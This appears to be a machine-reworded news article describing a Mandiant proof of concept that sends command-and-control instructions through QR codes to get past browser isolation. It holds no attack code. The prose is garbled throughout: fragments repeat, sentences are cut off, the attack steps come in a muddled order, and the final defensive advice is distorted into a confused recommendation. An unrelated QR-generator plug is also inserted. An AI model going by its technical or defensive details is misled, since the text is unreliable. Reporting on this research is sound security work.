Researchers have demonstrated a proof-of-concept cyberattack vector that works around remote, on-premises, and local security technologies to transmit malicious messages from an adversary-controlled server.
Security researchers have discovered an opportunity to circumvent three kinds of browser isolation. This allows cybercriminals to transmit malicious data to a device that is remote, employing QR codes.
Researchers from Mandiant presented a proof-of-concept (PoC) that circumvents remote, on-premises, and local browser isolation by overcoming HTTP request-based communications with machine-readable QR codes. This method allows attackers to communicate commands from a command-and-control (C2) server directly to the victim's device.
Browser isolation is typically employed by companies to combat the threat of phishing, secure the device from malicious attacks via browser, and deter the typical C2 techniques employed by hackers. The method runs a browser in a secure setting, like cloud servers or a virtual machine, and it then streams the video content to the device of the user.
If browser isolation is employed, the remote browser takes care of everything from rendering pages to running JavaScript while retaining only the look of the page returned to the local browser of the user.
Because attackers typically transmit messages to the victim's device via HTTP requests, the isolation of browsers is a challenge for hackers to remotely control devices using the standard method. It's due to the fact that HTTP response sent in the local web browser has solely the engine that streams that is used to show the remote's visible page content, "and only a stream of pixels is sent to the local browser to visually render the webpage," Mandiant principal security consultant Thibault Van Geluwe de Berlaere said in his blog. "This prevents typical HTTP-based C2 because the local device cannot decode the HTTP response."
Bypassing Browser Isolation With QR Codes
Mandiant researchers have created a PoC that shows how to overcome browser isolation with an application called the Puppeteer JavaScript library, as well as Google Chrome. Google Chrome browser in headless mode. But any modern browser can accomplish the PoC, Van Geluwe de Berlaere said.
Instead of delivering the C2 information in the HTTP body or in the headers in a way that an attacker-controlled attempt to communicate commands to devices could be, the C2 server will return a valid web page that shows visually the QR code. "The implant then uses a local headless browser ... to render the page, grabs a screenshot, and reads the QR code to retrieve the embedded data," Van Geluwe de Berlaere said in his.
"By taking advantage of machine-readable QR codes, an attacker can send data from the attacker-controlled server to a malicious implant even when the webpage is rendered in a remote browser."
In the attack, the malicious device renders the page from the browser's isolation pixel streaming engine, and then decodes the command in the QR code that is displayed on the webpage. It then retrieves an authentic HTML page via the C2 server, with the command information encoded in the form of a QR code that is displayed on the webpage.
The remote browser will then return the pixel-streaming machine in the browser local to it. It then starts the visual stream, which shows the rendered webpage that was downloaded by the C2 server. C2 server. The malware waits for the page to render completely before taking a picture of the local browser. It includes the QR code, which it uses to run the C2 command on the compromised device.
The device then runs the local browser to find a new URL which contains commands encoded into the URL parameter. The parameter is then passed into the browser on the remote, and eventually it is sent to the C2 server. C2 server. The C2 interprets the command output like the standard HTTP-based C2.
Note: If you need to create a QR code, use a QR code generator for a quick and easy solution.
Challenges to Implementing the Bypass
While the PoC shows how attackers can bypass the browser's isolation, there are some drawbacks and issues to be aware of while using it, researchers pointed out.
One reason is that it's simply not practical to utilize the PoC using QR codes that contain the maximum size of data that is - i.e. 2953, 177 x 177 pixels error correction level "L" as "the visual stream of the web page rendered in the local browser was of insufficient quality to reliably read the QR code contents," Van Geluwe de Berlaere said. Instead, the researchers utilised QR codes with a maximum of 2,189 bytes of data.
Furthermore, requests take at most five seconds to display or scan QR codes, due to the processing that is required with you use Chrome using headless mode in addition to the time it takes that remote web browser begin up, the page rendering requirements as well as the streaming of video content from the remote browser on to the locally-operating browser. "This introduces significant latency in the C2 channel," the author stated.
Additionally, lastly, the PoC does not take into account other security options of browser isolation, like the reputation of domains, URL scanning, data loss prevention, or request heuristics. These could require overcoming should they be present in the browser-isolation system if it is employed.
Despite the effectiveness in bypassing the system, Mandiant still recommends browser isolation as a powerful security measure against browser exploitation by clients and attacks involving phishing. But, as Van Geluwe de Berlaere said, it should be utilised as a component in "a well-rounded cyber defence posture" that includes monitoring for unusual internet traffic, and putting your browser into automation mode to guard against web-based attacks.
Top comments (0)